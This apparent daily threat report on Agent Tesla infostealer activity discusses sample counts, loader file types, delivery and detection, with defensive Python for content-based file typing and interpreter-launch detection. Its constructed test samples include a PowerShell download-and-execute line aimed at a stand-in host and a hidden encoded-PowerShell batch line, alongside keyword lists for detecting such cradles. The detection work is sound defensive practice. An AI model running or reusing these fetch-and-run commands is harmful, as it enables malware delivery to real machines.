Agent Tesla - Daily Threat Report

Monday, May 4, 2026

Daily Summary

Agent Tesla activity remained stable on 2026-05-04, with 64 new samples detected against a 7-day average of 61, an increase of roughly 5% (three samples). This marginal uptick is within normal daily variation and reflects sustained, consistent distribution rather than a surge. No abrupt spikes or drops were observed.

New Samples Detected

The new sample set shows a clear preference for script-based loaders: .ps1 (19 samples) and .js (15 samples) together account for 34 of the 64 detections, just over half. Executables (.exe) totaled 13, while .dll, .bat, and archive formats (.tar, .rar, .gz, .zip) appeared in smaller numbers. One sample carried the non-standard extension .93763227. Windows will not launch such a file on double-click, so it is more plausibly a second-stage payload fetched and renamed by a loader, or a file renamed during upload or analysis, than a direct lure; it should be typed by its content (magic bytes), not by its name. Agent Tesla itself is a .NET executable, so the PowerShell and JavaScript files are loaders whose job is to fetch or decode the stealer and run it, typically through the built-in interpreters (powershell.exe, wscript.exe) rather than by dropping a standalone executable first.

Distribution Methods

Today's samples are dominated by script payloads, most likely delivered as phishing-email attachments or as links to files hosted on compromised sites. The high count of .ps1 and .js files points to campaigns that depend on user interaction: a .js attachment runs through wscript.exe as soon as it is double-clicked, whereas a .ps1 file opens in an editor on double-click and therefore needs a launcher such as a shortcut, a batch file, or a macro. Only 4 of the 64 samples are .zip or .rar archives, which is unusual against typical malware delivery trends; one day of data is not enough to call this a deliberate shift, but bare scripts do bypass gateways configured to block archives while passing scripts. Note that many mail clients and gateways block .js and .ps1 attachments outright, so scripts that would otherwise be direct attachments often arrive instead via a link or nested inside another container.

Detection Rate

Current AV engines show moderate detection for these variants, but script-heavy payloads can evade static detection through heavy obfuscation and by executing through legitimate system interpreters. The .93763227 sample is not hidden from signature scanning by its extension: AV engines match on file content, so a renamed PE is still scanned as a PE. What an unusual extension does defeat is extension-based attachment filtering and file-type policy rules, which is why content-based file typing matters. Dynamic analysis remains more reliable for catching these samples.
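As an added illustration, not part of this report or of its data sources, the following Python types a file by its content and compares that with what the extension claims: magic bytes for PE, zip, rar, gzip, bzip2 and tar, plus simple keyword heuristics for PowerShell, JavaScript and batch text. The sample bytes, file names, keyword lists and verdict labels are all constructed for the example; a PE renamed to .93763227 comes out as "pe" regardless of its name, while a PE named lure.zip is reported as a mismatch.

```python
import os

# Magic bytes (offset, signature, label) for the container and executable formats
# seen in this batch. Constructed for the example; extend as needed.
MAGIC = [
    (0, b"MZ", "pe"),            # Windows PE: .exe / .dll
    (0, b"PK\x03\x04", "zip"),
    (0, b"Rar!\x1a\x07", "rar"),
    (0, b"\x1f\x8b", "gzip"),
    (0, b"BZh", "bzip2"),
    (257, b"ustar", "tar"),      # POSIX tar keeps its magic at offset 257
]

# Case-insensitive keyword hints for script text. These are example heuristics,
# not a signature set; heavily obfuscated scripts will score low on them.
SCRIPT_MARKERS = {
    "powershell": (b"new-object", b"invoke-expression", b"iex ", b"-encodedcommand",
                   b"downloadstring", b"[system."),
    "javascript": (b"activexobject", b"wscript.", b"eval(", b"unescape(", b"var "),
    "batch": (b"@echo off", b"%temp%", b"cmd /c", b"start /b"),
}

# What the extension claims the file is; any other extension is treated as unknown.
EXPECTED = {
    ".exe": "pe", ".dll": "pe", ".zip": "zip", ".rar": "rar", ".gz": "gzip",
    ".tar": "tar", ".bz2": "bzip2", ".ps1": "powershell", ".js": "javascript", ".bat": "batch",
}


def identify(data: bytes) -> str:
    """Classify a blob by content alone; the file name is deliberately ignored."""
    for offset, sig, label in MAGIC:
        if data[offset:offset + len(sig)] == sig:
            return label
    head = data[:4096]
    # Only ASCII text is scored as a script; binary junk without a known magic stays unknown.
    if not head or not all(b in b"\t\r\n" or 0x20 <= b < 0x7F for b in head):
        return "unknown"
    lowered = head.lower()
    scores = {fam: sum(1 for m in marks if m in lowered) for fam, marks in SCRIPT_MARKERS.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] else "text"


def triage(name: str, data: bytes) -> dict:
    """Compare what the extension claims with what the bytes actually are."""
    ext = os.path.splitext(name)[1].lower()
    content = identify(data)
    expected = EXPECTED.get(ext)
    verdict = "ok"
    if expected is None and content not in ("unknown", "text"):
        verdict = "disguised"      # e.g. a PE renamed to .93763227
    elif expected is not None and expected != content:
        verdict = "mismatch"       # e.g. a PE named lure.zip
    return {"name": name, "ext": ext, "content": content, "verdict": verdict}


# Constructed stand-in bytes for the example; none of this is real malware.
SAMPLES = {
    "invoice.ps1": b"$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/a')",
    "report.js": b"var s = new ActiveXObject('WScript.Shell'); eval(unescape('%61%62'));",
    "run.bat": b"@echo off\r\nstart /b powershell -nop -w hidden -enc QQBB\r\n",
    "sample.93763227": b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00",
    "lure.zip": b"MZ\x90\x00" + bytes(60) + b"PE\x00\x00",
    "backup.tar": bytes(257) + b"ustar\x00" + bytes(250),
    "data.gz": b"\x1f\x8b\x08\x00" + bytes(6) + b"\x03",
}


def triage_all() -> list:
    return [triage(name, data) for name, data in SAMPLES.items()]


if __name__ == "__main__":
    for row in triage_all():
        print(f"{row['name']:<18} ext={row['ext']:<10} content={row['content']:<11} {row['verdict']}")
```

The point of the check is the last column: an extension-based filter never sees the .93763227 file as an executable, while the content check does, and the same check catches the opposite trick of an executable carrying an archive extension.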

C2 Infrastructure

No new C2 servers were identified today, suggesting the current infrastructure remains stable and reused from prior campaigns. No geographic patterns emerged from newly reported IOCs, because today's 64 new IOCs are file hashes rather than network indicators.

7-Day Trend

Activity over the past week has been remarkably steady, with daily counts fluctuating only slightly around the 61-sample average. Today's increase of roughly 5% does not signal a ramp-up but rather routine distribution within an established campaign.

Security Analysis

An easily overlooked detail in this batch is the presence of .tar and .gz archives, which are less common for Agent Tesla than .zip or .rar and often fall outside the scope of email filters tuned for those two formats. Defenders should extend archive analysis to .tar, .gz, .tgz, and .bz2 (including nested combinations such as .tar.gz), identify archive members by content rather than by extension, and add behavioral rules that flag script interpreters (wscript.exe, cscript.exe, powershell.exe) launched on files under archive-extraction and download paths.
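The behavioral rule recommended above, written out in Python as an added example (it is not taken from the report or from any vendor rule set) over constructed process-creation events with Sysmon Event ID 1 style fields (image, command line, parent image). The extraction-folder patterns reflect the well-known temporary directories used by the Explorer zip preview (Temp1_<archive>), WinRAR (Rar$...) and 7-Zip (7z...); the event IDs, paths, user names and command lines are constructed for the example.

```python
import re

INTERPRETERS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
ARCHIVE_TOOLS = {"winrar.exe", "7zfm.exe", "7zg.exe"}   # script spawned directly by the archiver

# Where a script lands after a user opens an attachment or previews an archive.
# Temp1_<archive> is Explorer's zip preview folder, Rar$... WinRAR's, 7z... 7-Zip's.
SUSPECT_PATHS = [
    (r"\\Temp\\Temp1_[^\\]+\\", "Explorer zip preview folder"),
    (r"\\Temp\\Rar\$[^\\]+\\", "WinRAR extraction folder"),
    (r"\\Temp\\7z[A-Za-z0-9]*\\", "7-Zip extraction folder"),
    (r"\\Content\.Outlook\\", "Outlook attachment cache"),
    (r"\\INetCache\\", "browser/mail download cache"),
    (r"\\Downloads\\", "user Downloads folder"),
]

# Any script file referenced on the command line (quoted paths may contain spaces).
SCRIPT_PATH = re.compile(r'"?([A-Za-z]:\\[^"]*?\.(?:ps1|js|jse|vbs|vbe|wsf|hta))\b', re.I)
# PowerShell switches that hide the window or pass an encoded command (-e, -enc, -EncodedCommand).
HIDDEN_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:nc(?:odedcommand)?)?\s", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means no alert."""
    reasons = []
    image = basename(event["image"])
    if image not in INTERPRETERS:
        return reasons
    parent = basename(event["parent_image"])
    cmdline = event["command_line"]
    for match in SCRIPT_PATH.finditer(cmdline):
        script = match.group(1)
        for pattern, label in SUSPECT_PATHS:
            if re.search(pattern, script, re.I):
                reasons.append(f"{image} ran {script} from {label}")
                break
    if parent in ARCHIVE_TOOLS:
        reasons.append(f"{image} spawned directly by archiver {parent}")
    # Hidden-window / encoded flags are only counted once the script came from a risky place,
    # so routine admin scripts using -w hidden do not alert on their own.
    if reasons and HIDDEN_FLAGS.search(cmdline):
        reasons.append("hidden window or encoded command on the command line")
    return reasons


def run(events: list) -> dict:
    """Map event id -> reasons for every event that trips the rule."""
    hits = {}
    for event in events:
        reasons = evaluate(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


# Constructed process-creation events; none of this is real telemetry.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\bob\AppData\Local\Temp\Temp1_Invoice.zip\Invoice.js"'},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -w hidden -ep bypass -File "C:\Users\bob\Downloads\report.ps1"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Corp\Scripts\inventory.ps1"},
    {"id": 4, "image": r"C:\Windows\System32\cscript.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cscript //nologo C:\Windows\System32\slmgr.vbs /dli"},
    {"id": 5, "image": r"C:\Windows\System32\wscript.exe", "parent_image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\bob\AppData\Local\Temp\Rar$DIa1234.5678\attachment.js"'},
]

if __name__ == "__main__":
    for event_id, reasons in run(EVENTS).items():
        print(event_id, "; ".join(reasons))
```

Events 1, 2 and 5 trip the rule (zip preview folder, Downloads plus a hidden window, and a WinRAR extraction folder with WinRAR as parent), while the scheduled admin script in ProgramData and the stock slmgr.vbs call do not. In production the same logic maps onto a Sigma or EDR rule keyed on Image, ParentImage and CommandLine; the path list is the part to tune to your environment.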

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
